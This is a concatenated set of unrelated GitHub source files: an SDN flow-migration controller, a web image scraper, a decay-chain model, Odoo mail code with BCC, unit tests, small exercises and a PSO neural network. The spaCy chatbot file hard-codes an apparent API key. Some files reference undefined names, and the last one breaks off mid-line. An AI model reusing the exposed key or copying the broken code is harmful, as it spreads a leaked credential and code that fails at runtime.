event.connection.dpid == ovs2_dpid:\n port_dict = {2:2,3:1}\n insert_sw_id = ovs5_dpid\n elif event.connection.dpid == ovs3_dpid:\n port_dict = {1:3,3:1}\n insert_sw_id = ovs6_dpid\n \n _insert_flow_into_switch(stats, insert_sw_id, port_dict)\n\ndef _insert_flow_into_switch(flows, switch_dpid, port_dict):\n for connection in core.openflow._connections.values():\n if connection.dpid == switch_dpid:\n log.info(\"delete existing flow tables on switch %s\", connection.dpid)\n _delete_flow_tables(connection)\n\n log.info(\"install rule on switch %s\", connection.dpid)\n for flow in flows:\n #log.info(\"flow: %s\", flow)\n msg = _flow_stats_to_flow_mod(flow, port_dict)\n #log.info(\"msg: %s\", msg)\n connection.send(msg)\n\n \ndef _delete_flow_tables(connection):\n clear_msg = of.ofp_flow_mod(command = of.OFPFC_DELETE)\n connection.send(clear_msg)\n\n# insert rules to new switch \ndef _bring_ovs_back(sw_dpid, stats):\n port_dict = {}\n insert_sw_id = 0\n if sw_dpid == ovs1_dpid:\n port_dict = {2:2,3:3,4:4}\n insert_sw_id = ovs4_dpid\n elif sw_dpid == ovs2_dpid:\n port_dict = {2:2,3:3}\n insert_sw_id = ovs5_dpid\n elif sw_dpid == ovs3_dpid:\n port_dict = {1:3,3:1}\n insert_sw_id = ovs6_dpid\n\n _insert_flow_into_switch(stats, insert_sw_id, port_dict)\n\n\n\n# handler to bring down the interfaces in new VNs after all flows are installed\ndef _handle_flow_ready(event):\n if event.ofp.xid != 0x80000000:\n return\n log.debug(\"barrier msg received from %s: \", event.connection.dpid)\n \n if event.connection.dpid == ovs1_dpid:\n log.info('bring up tunnel interfaces in ovs-1 and ovs-4')\n remote_cmd.ssh_run_cmd(ovs1_IP, 'sudo ifconfig eth1 up')\n remote_cmd.ssh_run_cmd(ovs4_IP, 'sudo ifconfig eth1 up')\n\n log.info('redirect at gateway 1 and 2 to vn2')\n for connection in core.openflow._connections.values():\n if connection.dpid == g1_dpid:\n _gw_to_vn(connection, 1, 3, 2)\n elif connection.dpid == g2_dpid:\n _gw_to_vn(connection, 1, 3, 2)\n\n\n log.info('movs ovs-2')\n log.debug('bring down interface in ovs-2')\n remote_cmd.ssh_run_cmd(ovs2_IP,'sudo ifconfig eth2 down')\n\n log.info('request flow tables in ovs2')\n for connection in core.openflow._connections.values():\n if connection.dpid == ovs2_dpid:\n _request_flow_info(connection)\n\n elif event.connection.dpid == ovs2_dpid:\n log.info('bring up the interfaces in ovs-2 and ovs-5')\n remote_cmd.ssh_run_cmd(ovs2_IP,'sudo ifconfig eth1 up')\n remote_cmd.ssh_run_cmd(ovs5_IP,'sudo ifconfig eth1 up')\n\n log.info('bring down the interaces in ovs-4')\n #remote_cmd.ssh_run_cmd(ovs4_IP,'sudo ifconfig eth1 down')\n \n log.info('move ovs-3')\n log.debug('bring down the interfaces on ovs-3')\n remote_cmd.ssh_run_cmd(ovs3_IP,'sudo ifconfig eth1 down')\n\n log.info('request flow tables on ovs3')\n for connection in core.openflow._connections.values():\n if connection.dpid == ovs3_dpid:\n _request_flow_info(connection)\n\n elif event.connection.dpid == ovs3_dpid:\n log.info('bring down the interaces in ovs-5')\n #remote_cmd.ssh_run_cmd(ovs4_IP,'sudo ifconfig eth1 down')\n\n log.info('redirect at gateway 3 to vn2')\n for connection in core.openflow._connections.values():\n if connection.dpid == g3_dpid:\n _gw_to_vn(connection, 1, 3, 2)\n\n log.info('migration finished')\n global start_time\n migration_time = time.time() - start_time\n log.info(\"%s seconds\", migration_time)\n \ndef _drop(duration, connection, inport):\n if duration is not None:\n if not isinstance(duration, tuple):\n duration = (duration, duration)\n msg = of.ofp_flow_mod()\n msg.in_port = 
inport\n msg.idle_timeout = duration[0]\n msg.hard_timeout = duration[1]\n connection.send(msg)\n\ndef _flow_stats_to_flow_mod (flow, port_dict):\n actions = flow.get('actions', [])\n if not isinstance(actions, list): actions = [actions]\n actions = [_dict_to_action(a, port_dict) for a in actions]\n if 'output' in flow: \n a = of.ofp_action_output(port=_fix_of_int(flow['output']))\n po.actions.append(a)\n\n fm = of.ofp_flow_mod()\n match_list = flow.get('match')\n\n\n in_port = match_list.get('in_port')\n fm.match.in_port = port_dict[in_port]\n\n fm.match.dl_src = EthAddr(match_list.get('dl_src'))\n fm.match.dl_dst = EthAddr(match_list.get('dl_dst'))\n fm.match.dl_vlan = match_list.get('dl_vlan')\n if match_list.get('dl_type') == 'IP':\n fm.match.dl_type = 0x800\n elif match_list.get('dl_type') == 'ARP':\n fm.match.dl_type = 0x806\n fm.match.new_tos = match_list.get('nw_tos')\n fm.match.nw_proto = match_list.get('nw_proto')\n\n fm.match.nw_src = match_list.get('nw_src')\n fm.match.nw_dst = match_list.get('nw_dst')\n fm.match.tp_src = match_list.get('tp_src')\n fm.match.tp_dst = match_list.get('tp_dst')\n\n \n fm.actions = actions\n\n for k in ['cookie', 'idle_timeout', 'hard_timeout', 'priority']:\n if k in flow:\n setattr(fm, k, flow[k])\n #i = 0\n return fm\n\ndef _dict_to_action (d, port_dict) :\n d = d.copy()\n\n if 'port' in d:\n d['port'] = port_dict[d['port']]\n\n #if swap_port:\n #if 'port' in d:\n #if d['port'] == 1:\n #d['port']=2\n #elif d['port'] == 2:\n #d['port']=1\n\n t = d['type'].upper()\n del d['type']\n if not t.startswith(\"OFPAT_\"): t = \"OFPAT_\" + t\n t = of.ofp_action_type_rev_map[t]\n cls = of._action_type_to_class[t]\n a = cls(**d)\n return a\n\n \n# main functiont to launch the module\ndef launch ():\n from pox.lib.recoco import Timer\n\n # attach handsers to listners\n core.openflow.addListenerByName(\"FlowStatsReceived\", \n _handle_flowstats_received) \n\n # migrate virtual network\n _migrate_vn()\n\n","repo_name":"YimengZhao/VNM-GENI","sub_path":"python-code/controller/3-ovs-gw-tunnel/migrate_3_drop.py","file_name":"migrate_3_drop.py","file_ext":"py","file_size_in_byte":13474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12387815203","text":"from selenium import webdriver\nimport time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom lxml import etree\nimport requests\n\nbrowser= webdriver.Chrome(executable_path=r'E:\\software\\browser\\chromedriver_win32\\chromedriver.exe')\nwait = WebDriverWait(browser,20)\nbrowser.get('http://image.baidu.com/search/index?tn=baiduimage&ps=1&ct=201326592&lm=-1&cl=2&nc=1&ie=utf-8&word=美女')\n\nwhile True:\n\n print('==============')\n # 提取图片链接,并保存图片\n html = browser.page_source\n html = etree.HTML(html)\n img_content = html.xpath('//div[@id=\"imgid\"]/div[last()]//li/@data-objurl')\n for img in img_content:\n try:\n img_name = img[img.rfind('/'):]\n response = requests.get(img)\n img_text = response.content\n with open('./baidupic'+img_name,'wb') as f:\n f.write(img_text)\n print(img_name)\n except Exception as e:\n print(e)\n print(img,'失败')\n\n # 翻页\n browser.execute_script('window.scrollTo(0,document.body.scrollHeight)')\n 
time.sleep(4)\n\n\n","repo_name":"theme716/small-routine","sub_path":"insect/10.ten_day/2.selenium_baidu_pic.py","file_name":"2.selenium_baidu_pic.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41945989871","text":"from decay_chain import DecayChain\nfrom radon_setup import DC1Lambda, DC1Mode, DC2Lambda, DC2Mode\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nif __name__ == \"__main__\":\n Rn222_DC = DecayChain(DC1Lambda, DC1Mode)\n Rn220_DC = DecayChain(DC2Lambda, DC2Mode)\n\n sample_time = 3 # in seconds\n sample_duration = 60 * 5 # in seconds\n filling_time = 90 # in seconds\n\n x_220 = Rn220_DC.expected_counts(sample_time, sample_duration // sample_time, filling_time, counted=[\"a\"])\n x_222 = Rn222_DC.expected_counts(sample_time, sample_duration // sample_time, filling_time, counted=[\"a\"])\n\n print(\"x_220: \")\n print(x_220)\n plt.plot(x_220)\n plt.show()\n print(\"x_222: \")\n print(x_222)\n plt.plot(x_222)\n plt.show()\n\n X = np.transpose(np.vstack((x_222, x_220)))\n\n print(\"X: \")\n print(X)\n\n X_pi = np.matmul(np.linalg.inv(np.matmul(np.transpose(X), X)), np.transpose(X))\n print(\"(X' X)\\\\X': \")\n print(X_pi)\n","repo_name":"StephenStyles/Radon","sub_path":"Python/model_parameters.py","file_name":"model_parameters.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"22513793019","text":"from dataBase import *\nfrom utils import *\n\ndef cadastrarCliente():\n cliente = {\n \"Nome\": input(\"Nome: \"),\n \"CPF\": validaCPF(input(\"CPF: \")),\n \"RG\": validaRG(input(\"RG: \")),\n \"Nascimento\": validaDataNascimento(),\n \"CEP\": buscarCEP(input(\"CEP: \")),\n \"Complemento\": input(\"Complemento: \"),\n \"Número\": int(input(\"Número da residência: \"))\n }\n\n return cliente\n\ndef menuCliente():\n while True:\n print(\"Menu Cliente\")\n print(\"1 - Cadastrar Cliente\")\n print(\"2 - Alterar Cliente\")\n print(\"3 - Buscar Cliente\")\n print(\"4 - Deletar Cliente\")\n print(\"5 - Listar Clientes\")\n print(\"6 - Voltar ao menu anterior\")\n op = int(input(\"Digite a opção desejada: \"))\n\n if (op == 1):\n clear()\n try:\n cliente = cadastrarCliente()\n insertDataBase(cliente)\n except:\n print(\"Erro ao cadastrar cliente, tente novamente!\")\n \n elif (op == 2):\n clear()\n try:\n updateDataBase(input(\"Digite o CPF do cliente que deseja alterar: \"))\n except:\n print(\"Erro ao alterar cliente, tente novamente!\")\n \n elif (op == 3):\n clear()\n try:\n selectClienteDataBase(input(\"Digite o CPF do cliente que deseja buscar: \"))\n except:\n print(\"Erro ao buscar cliente, tente novamente!\")\n \n elif (op == 4):\n clear()\n try: \n deleteDataBase(input(\"Digite o CPF do cliente que deseja deletar: \"))\n except:\n print(\"Erro ao deletar cliente, tente novamente!\")\n \n elif (op == 5):\n clear()\n try:\n selectDataBase()\n except:\n print(\"Erro ao listar clientes, tente novamente!\")\n \n elif (op == 6):\n clear()\n return\n \n else:\n clear()\n print(\"Opção inválida, tente novamente!\")\n\n","repo_name":"FabioKishino/ada-python","sub_path":"cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12998308010","text":"import mock\n\nimport sys\n\nfrom test_utils import 
CharmTestCase\n\nsys.path.append('hooks')\n\nimport pause_resume as actions\n\n\nclass PauseTestCase(CharmTestCase):\n def setUp(self):\n super(PauseTestCase, self).setUp(\n actions, [\"check_call\",\n \"get_local_osd_ids\",\n \"set_unit_paused\",\n \"assess_status\"])\n\n def test_pauses_services(self):\n self.get_local_osd_ids.return_value = [5]\n actions.pause([])\n cmd = ['ceph', '--id',\n 'osd-upgrade', 'osd', 'out', '5']\n self.check_call.assert_called_once_with(cmd)\n self.set_unit_paused.assert_called_once_with()\n self.assess_status.assert_called_once_with()\n\n\nclass ResumeTestCase(CharmTestCase):\n def setUp(self):\n super(ResumeTestCase, self).setUp(\n actions, [\"check_call\",\n \"get_local_osd_ids\",\n \"clear_unit_paused\",\n \"assess_status\"])\n\n def test_pauses_services(self):\n self.get_local_osd_ids.return_value = [5]\n actions.resume([])\n cmd = ['ceph', '--id',\n 'osd-upgrade', 'osd', 'in', '5']\n self.check_call.assert_called_once_with(cmd)\n self.clear_unit_paused.assert_called_once_with()\n self.assess_status.assert_called_once_with()\n\n\nclass MainTestCase(CharmTestCase):\n def setUp(self):\n super(MainTestCase, self).setUp(actions, [\"action_fail\"])\n\n def test_invokes_action(self):\n dummy_calls = []\n\n def dummy_action(args):\n dummy_calls.append(True)\n\n with mock.patch.dict(actions.ACTIONS, {\"foo\": dummy_action}):\n actions.main([\"foo\"])\n self.assertEqual(dummy_calls, [True])\n\n def test_unknown_action(self):\n \"\"\"Unknown actions aren't a traceback.\"\"\"\n exit_string = actions.main([\"foo\"])\n self.assertEqual(\"Action foo undefined\", exit_string)\n\n def test_failing_action(self):\n \"\"\"Actions which traceback trigger action_fail() calls.\"\"\"\n dummy_calls = []\n\n self.action_fail.side_effect = dummy_calls.append\n\n def dummy_action(args):\n raise ValueError(\"uh oh\")\n\n with mock.patch.dict(actions.ACTIONS, {\"foo\": dummy_action}):\n actions.main([\"foo\"])\n self.assertEqual(dummy_calls, [\"Action foo failed: uh oh\"])\n","repo_name":"juanarturovargas/openstack-juju","sub_path":"ceph-osd/unit_tests/test_actions_pause_resume.py","file_name":"test_actions_pause_resume.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42994481869","text":"# -*- coding: utf-8 -*-\nfrom openerp.osv import fields, osv\nfrom datetime import datetime\nfrom openerp import tools\nfrom openerp import netsvc\nimport base64\nfrom openerp import SUPERUSER_ID\nimport logging\n\n_logger = logging.getLogger(__name__)\n\nclass email_template(osv.osv):\n _inherit = \"email.template\"\n \n _columns = {\n 'email_bcc': fields.char('Bcc', help=\"Blind carbon copy recipients (placeholders may be used here)\"),\n }\n \n def generate_email_batch(self, cr, uid, template_id, res_ids, context=None, fields=None):\n \"\"\"Generates an email from the template for given the given model based on\n records given by res_ids.\n\n :param template_id: id of the template to render.\n :param res_id: id of the record to use for rendering the template (model\n is taken from template definition)\n :returns: a dict containing all relevant fields for creating a new\n mail.mail entry, with one extra key ``attachments``, in the\n format [(report_name, data)] where data is base64 encoded.\n \"\"\"\n if context is None:\n context = {}\n if fields is None:\n #NG: add email_bcc to fields\n fields = ['subject', 'body_html', 'email_from', 'email_to', 'email_bcc', 'partner_to', 'email_cc', 
'reply_to']\n\n report_xml_pool = self.pool.get('ir.actions.report.xml')\n res_ids_to_templates = self.get_email_template_batch(cr, uid, template_id, res_ids, context)\n\n # templates: res_id -> template; template -> res_ids\n templates_to_res_ids = {}\n for res_id, template in res_ids_to_templates.iteritems():\n templates_to_res_ids.setdefault(template, []).append(res_id)\n\n results = dict()\n for template, template_res_ids in templates_to_res_ids.iteritems():\n # generate fields value for all res_ids linked to the current template\n for field in fields:\n generated_field_values = self.render_template_batch(\n cr, uid, getattr(template, field), template.model, template_res_ids,\n post_process=(field == 'body_html'),\n context=context)\n for res_id, field_value in generated_field_values.iteritems():\n results.setdefault(res_id, dict())[field] = field_value\n # compute recipients\n results = self.generate_recipients_batch(cr, uid, results, template.id, template_res_ids, context=context)\n # update values for all res_ids\n for res_id in template_res_ids:\n values = results[res_id]\n # body: add user signature, sanitize\n if 'body_html' in fields and template.user_signature:\n signature = self.pool.get('res.users').browse(cr, uid, uid, context).signature\n values['body_html'] = tools.append_content_to_html(values['body_html'], signature)\n if values.get('body_html'):\n values['body'] = tools.html_sanitize(values['body_html'])\n # technical settings\n values.update(\n mail_server_id=template.mail_server_id.id or False,\n auto_delete=template.auto_delete,\n model=template.model,\n res_id=res_id or False,\n attachment_ids=[attach.id for attach in template.attachment_ids],\n )\n\n # Add report in attachments: generate once for all template_res_ids\n if template.report_template:\n for res_id in template_res_ids:\n attachments = []\n report_name = self.render_template(cr, uid, template.report_name, template.model, res_id, context=context)\n report = report_xml_pool.browse(cr, uid, template.report_template.id, context)\n report_service = report.report_name\n # Ensure report is rendered using template's language\n ctx = context.copy()\n if template.lang:\n ctx['lang'] = self.render_template_batch(cr, uid, template.lang, template.model, [res_id], context)[res_id] # take 0 ?\n\n if report.report_type in ['qweb-html', 'qweb-pdf']:\n result, format = self.pool['report'].get_pdf(cr, uid, [res_id], report_service, context=ctx), 'pdf'\n else:\n result, format = openerp.report.render_report(cr, uid, [res_id], report_service, {'model': template.model}, ctx)\n \n # TODO in trunk, change return format to binary to match message_post expected format\n result = base64.b64encode(result)\n if not report_name:\n report_name = 'report.' 
+ report_service\n ext = \".\" + format\n if not report_name.endswith(ext):\n report_name += ext\n attachments.append((report_name, result))\n results[res_id]['attachments'] = attachments\n\n return results\n\nemail_template()\n\nclass mail_mail(osv.osv):\n _inherit = \"mail.mail\"\n \n _columns = {\n 'email_bcc': fields.char('Bcc', help=\"Blind carbon copy recipients (placeholders may be used here)\"),\n }\n \n def send(self, cr, uid, ids, auto_commit=False, raise_exception=False, context=None):\n \"\"\" Sends the selected emails immediately, ignoring their current\n state (mails that have already been sent should not be passed\n unless they should actually be re-sent).\n Emails successfully delivered are marked as 'sent', and those\n that fail to be deliver are marked as 'exception', and the\n corresponding error mail is output in the server logs.\n\n :param bool auto_commit: whether to force a commit of the mail status\n after sending each mail (meant only for scheduler processing);\n should never be True during normal transactions (default: False)\n :param bool raise_exception: whether to raise an exception if the\n email sending process has failed\n :return: True\n \"\"\"\n if context is None:\n context = {}\n ir_mail_server = self.pool.get('ir.mail_server')\n ir_attachment = self.pool['ir.attachment']\n for mail in self.browse(cr, SUPERUSER_ID, ids, context=context):\n try:\n # TDE note: remove me when model_id field is present on mail.message - done here to avoid doing it multiple times in the sub method\n if mail.model:\n model_id = self.pool['ir.model'].search(cr, SUPERUSER_ID, [('model', '=', mail.model)], context=context)[0]\n model = self.pool['ir.model'].browse(cr, SUPERUSER_ID, model_id, context=context)\n else:\n model = None\n if model:\n context['model_name'] = model.name\n\n # load attachment binary data with a separate read(), as prefetching all\n # `datas` (binary field) could bloat the browse cache, triggerring\n # soft/hard mem limits with temporary data.\n attachment_ids = [a.id for a in mail.attachment_ids]\n attachments = [(a['datas_fname'], base64.b64decode(a['datas']))\n for a in ir_attachment.read(cr, SUPERUSER_ID, attachment_ids,\n ['datas_fname', 'datas'])]\n\n # specific behavior to customize the send email for notified partners\n email_list = []\n if mail.email_to:\n email_list.append(self.send_get_email_dict(cr, uid, mail, context=context))\n for partner in mail.recipient_ids:\n email_list.append(self.send_get_email_dict(cr, uid, mail, partner=partner, context=context))\n # headers\n headers = {}\n bounce_alias = self.pool['ir.config_parameter'].get_param(cr, uid, \"mail.bounce.alias\", context=context)\n catchall_domain = self.pool['ir.config_parameter'].get_param(cr, uid, \"mail.catchall.domain\", context=context)\n if bounce_alias and catchall_domain:\n if mail.model and mail.res_id:\n headers['Return-Path'] = '%s-%d-%s-%d@%s' % (bounce_alias, mail.id, mail.model, mail.res_id, catchall_domain)\n else:\n headers['Return-Path'] = '%s-%d@%s' % (bounce_alias, mail.id, catchall_domain)\n\n # build an RFC2822 email.message.Message object and send it without queuing\n res = None\n for email in email_list:\n msg = ir_mail_server.build_email(\n email_from=mail.email_from,\n email_to=email.get('email_to'),\n subject=email.get('subject'),\n body=email.get('body'),\n body_alternative=email.get('body_alternative'),\n email_cc=tools.email_split(mail.email_cc),\n #NG: add email_bcc from mail\n email_bcc=tools.email_split(mail.email_bcc),\n reply_to=mail.reply_to,\n 
attachments=attachments,\n message_id=mail.message_id,\n references=mail.references,\n object_id=mail.res_id and ('%s-%s' % (mail.res_id, mail.model)),\n subtype='html',\n subtype_alternative='plain',\n headers=headers)\n res = ir_mail_server.send_email(cr, uid, msg,\n mail_server_id=mail.mail_server_id.id,\n context=context)\n\n if res:\n mail.write({'state': 'sent', 'message_id': res})\n mail_sent = True\n else:\n mail.write({'state': 'exception'})\n mail_sent = False\n\n # /!\\ can't use mail.state here, as mail.refresh() will cause an error\n # see revid:odo@openerp.com-20120622152536-42b2s28lvdv3odyr in 6.1\n self._postprocess_sent_message(cr, uid, mail, context=context, mail_sent=mail_sent)\n _logger.info('Mail with ID %r and Message-Id %r successfully sent', mail.id, mail.message_id)\n except MemoryError:\n # prevent catching transient MemoryErrors, bubble up to notify user or abort cron job\n # instead of marking the mail as failed\n _logger.exception('MemoryError while processing mail with ID %r and Msg-Id %r. '\\\n 'Consider raising the --limit-memory-hard startup option',\n mail.id, mail.message_id)\n raise\n except Exception as e:\n _logger.exception('failed sending mail.mail %s', mail.id)\n mail.write({'state': 'exception'})\n self._postprocess_sent_message(cr, uid, mail, context=context, mail_sent=False)\n if raise_exception:\n if isinstance(e, AssertionError):\n # get the args of the original error, wrap into a value and throw a MailDeliveryException\n # that is an except_orm, with name and value as arguments\n value = '. '.join(e.args)\n raise MailDeliveryException(_(\"Mail Delivery Failed\"), value)\n raise\n\n if auto_commit is True:\n cr.commit()\n return True\n \nmail_mail()","repo_name":"lengocphat/DATN_phat_an","sub_path":"odoo-8.0/addons/vhr_base/model/email_template.py","file_name":"email_template.py","file_ext":"py","file_size_in_byte":12041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22962439162","text":"\"\"\"\nhttps://leetcode.com/problems/detect-capital/\n\nWe define the usage of capitals in a word to be \nright when one of the following cases holds:\n- All letters in this word are capitals, like \"USA\".\n- All letters in this word are not capitals, like \"leetcode\".\n- Only the first letter in this word is capital, like \"Google\".\n\nGiven a string word, return true if the usage of \ncapitals in it is right.\n\nExample 1:\nInput: word = \"USA\"\nOutput: true\n\nExample 2:\nInput: word = \"FlaG\"\nOutput: false\n\nConstraints:\n1 <= word.length <= 100\nword consists of lowercase and uppercase English letters.\n\"\"\"\n\n\ndef count_capitals(word: str) -> bool:\n # Time complexity: O(n)\n # Space complexity: O(1)\n num_capital_letters = sum(ord(c) < ord(\"a\") for c in word)\n n = len(word)\n if num_capital_letters == n or num_capital_letters == 0:\n return True\n if num_capital_letters == 1:\n return ord(word[0]) < ord(\"a\")\n return False\n\n\ndef count_capitals2(word: str) -> bool:\n # Time complexity: O(n)\n # Space complexity: O(1)\n # Use python built-in methods (slower)\n num_capital_letters = sum(c.isupper() for c in word)\n n = len(word)\n if num_capital_letters == n or num_capital_letters == 0:\n return True\n if num_capital_letters == 1:\n return word[0].isupper()\n return False\n\n\ndef python_methods(word: str) -> bool:\n # Time complexity: O(n)\n # Space complexity: O(1)\n # Use python built-in methods (even slower)\n return word.isupper() or word.islower() or 
word.istitle()\n\n\nif __name__ == \"__main__\":\n print(\"-\" * 60)\n print(\"Detect capital\")\n print(\"-\" * 60)\n\n test_cases = [\n (\"USA\", True),\n (\"Google\", True),\n (\"GooGlE\", False),\n (\"leetcode\", True),\n (\"leetCode\", False),\n (\"ALGORITHm\", False),\n ]\n\n for word, solution in test_cases:\n\n print(\"Word:\", word)\n\n result = count_capitals(word)\n output = f\" count_capitals = \"\n test_ok = solution == result\n output += str(result)\n output += \" \" * (50 - len(output))\n output += f'Test: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n result = count_capitals2(word)\n output = f\" count_capitals2 = \"\n test_ok = solution == result\n output += str(result)\n output += \" \" * (50 - len(output))\n output += f'Test: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n result = python_methods(word)\n output = f\" python_methods = \"\n test_ok = solution == result\n output += str(result)\n output += \" \" * (50 - len(output))\n output += f'Test: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n print()\n","repo_name":"daalgi/algorithms","sub_path":"strings/detect_capital.py","file_name":"detect_capital.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"31367680409","text":"import spacy\nimport requests\n\nnlp = spacy.load(\"en_core_web_md\")\n\napi_key = \"7f344331d0b2323597bb5c0818ed1cce\"\n\n\ndef chatbot(statement):\n weather = nlp(\"Current weather in a city\")\n statement = nlp(statement)\n min_similarity = 0.70\n \n if weather.similarity(statement) >= min_similarity:\n #pass\n #test_1:\n #similarity = weather.similarity(statement)\n #return similarity\n \n for ent in statement.ents:\n if ent.label_ == \"GPE\": # GeoPolitical Entity\n city = ent.text\n #break\n return city\n else:\n return \"You need to tell me a city to check.\" \n\n#test_2:\t\n\t\ncity1 = chatbot(\"What is the weather in Kiev\")\nprint(city1) \t\n\t\n\n","repo_name":"vi-u/24-extract-the-name-of-city-from-the-user-statement","sub_path":"w_3_just_city_good.py","file_name":"w_3_just_city_good.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"74143350973","text":"import cv2\nfrom skimage import filters\n\n\nimg = cv2.imread(\n \"/Users/pyanezs/Documents/procesamiento-imagenes/Fotos/cameraman.png\")\n\n# Transforma imagen a escala de grises\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nprewitt = filters.prewitt(gray)\n\ncv2.imshow(\"Prewwit\", prewitt)\n\ncv2.waitKey(0)\n","repo_name":"pyanezs/procesamiento-imagenes","sub_path":"03-Espacio-Frecuencia/codigos_clase/09_filtro_prewitt.py","file_name":"09_filtro_prewitt.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"45493330464","text":"from numpy import exp, array, dot, tanh, cos, asarray\nfrom ann import ArtificialNeuralNetwork, NeuralLayer\nfrom utils import *\nimport random\nfrom sys import exit\n\nvp = 0.5 #velocity proportion\npbp = 0.2 #personal best proportion\ngbp = 0.1 # global best proportion\njp = 0.05 # velocity jump size\n\npso_iterations = 100\ntarget_error = 1e-6\npso_particles = 40\n\n#ANN (Particle Settings)\n# Note : provide ANN layer based on input.\n# For eg for data set 0,1,2,3 give like array([[2,1],[2,2],[1,2]])\n# For data set 4 & 5 give like array([[2,2],[3,2],[1,3]])\nann_layer_config = 
array([[2,2],[2,2],[1,2]])\n# Activation functions Null -> 0 , Sigmoid -> 1, Hyperbloic Tan -> 2, Cosine -> 3, Gaussian -> 4\nactivation_function = 4\n# Data set file cubic -> 0 , linear -> 1, sine -> 2, tanh -> 3, complex -> 4, xor -> 5\ndata_set = 4\n\n#Particle class to keep the ANN details\nclass Particle():\n def __init__(self):\n self.ann_layer_config = ann_layer_config\n self.position = array([0, 0])\n self.pbest_position = self.position\n self.pbest_value = float('inf')\n # Create the ANN for this particle\n self.create_ann()\n\n def __str__(self):\n print(\"I am at \", self.position, \" meu pbest is \", self.pbest_position)\n\n #Adjust the postions (weights of particle)\n def move(self):\n self.position = self.position + dot(jp,self.velocity)\n self.set_ann_weights()\n\n #Create ANN with given configs and training data\n def create_ann(self):\n data = getDataFromFile(data_set)\n self.ann = ArtificialNeuralNetwork(self.ann_layer_config, activation_function, data[0], data[1] )\n self.set_initial_position()\n self.set_ann_weights()\n\n #Pass self position values to ANN to set weights\n def set_ann_weights(self):\n self.ann.set_weights_from_position(self.position)\n\n # Create array of random values\n def set_initial_position(self):\n init_position = []\n init_velocity = []\n for layer_config in self.ann_layer_config:\n for i in range(dot(layer_config[0],layer_config[1])):\n init_position.append(self.create_random())\n init_velocity.append(0)\n self.position = asarray(init_position)\n self.velocity = asarray(init_velocity)\n #Keep the same random as initial personal best value\n self.pbest_position = self.position\n\n def create_random(self):\n return random.uniform(-100,100)\n\nclass PSO_Space():\n\n def __init__(self, target, target_error, pso_particles):\n self.ann_layer_config = ann_layer_config\n self.target = target\n self.target_error = target_error\n self.pso_particles = pso_particles\n self.particles = []\n self.gbest_value = float('inf')\n self.gbest_position = array([0,0])\n self.set_initial_gbest_position()\n\n #Set initial random global best values\n def set_initial_gbest_position(self):\n init_gbest_position = []\n for layer_config in self.ann_layer_config:\n for i in range(dot(layer_config[0],layer_config[1])):\n init_gbest_position.append(self.create_random())\n self.gbest_position = asarray(init_gbest_position)\n\n def create_random(self):\n return random.uniform(-100,100)\n\n #Fitness function returns the MSE value of particle\n def fitness_func(self, particle):\n return particle.ann.mse\n\n #Find and set personal best position values based on MSE\n def set_personal_best(self):\n for particle in self.particles:\n fitness_value = self.fitness_func(particle)\n if (particle.pbest_value > fitness_value):\n particle.pbest_value = fitness_value\n particle.pbest_position = particle.position\n\n #Find and set global best position values based on MSE\n def set_global_best(self):\n for particle in self.particles:\n best_fitness_value = self.fitness_func(particle)\n if (self.gbest_value > best_fitness_value):\n self.gbest_value = best_fitness_value\n self.gbest_position = particle.position\n\n #Forward the ANN with training input\n def forwardfeed_particles(self):\n for particle in self.particles:\n particle.ann.forward_inside_ann()\n\n #Adjust the particles position\n def adjust_particles(self):\n for particle in self.particles:\n new_velocity = (vp * particle.velocity) + (random.uniform(0.0,pbp)) * (\n particle.pbest_position - particle.position) + \\\n (random.uniform(0.0, 
gbp)) * (self.gbest_position - particle.position)\n particle.velocity = new_velocity\n particle.move()\n\n#Create PSO\npso = PSO_Space(1, target_error, pso_particles)\n#Set particles for the PSO\npso.particles = [Particle() for _ in range(pso.pso_particles)]\n\niteration = 0\nwhile (iteration < pso_iterations):\n pso.forwardfeed_particles()\n pso.set_personal_best()\n pso.set_global_best()\n\n if (abs(pso.gbest_value - pso.target) <= pso.target_error):\n break\n\n pso.adjust_particles()\n iteration += 1\n if(iteration == 1):\n print(\"Initial MSE\", pso.particles[0].ann.mse, \" and weights for first particle\", pso.particles[0].position)\n\nprint(\"Final MSE\", pso.particles[0].ann.mse, \" and weights for first particle\", pso.particles[0].position)\n\n#Testing the output with the sample input\n#pso.particles[0].ann.set_weights_from_position(pso.gbest_position)\n#pso.particles[0].ann.set_input_values(array([0, 0, 1]))\n#pso.particles[0].ann.forward_inside_ann()\n#print (pso.particles[0].ann.ann_output)","repo_name":"sl1984/BiologicallyInspiredComputing","sub_path":"new/pso.py","file_name":"pso.py","file_ext":"py","file_size_in_byte":5640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31836757298","text":"from selenium.webdriver.firefox.options import Options\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nimport os\nimport shutil\n\ndef init_browser():\n opts = Options()\n\n selenum_url = 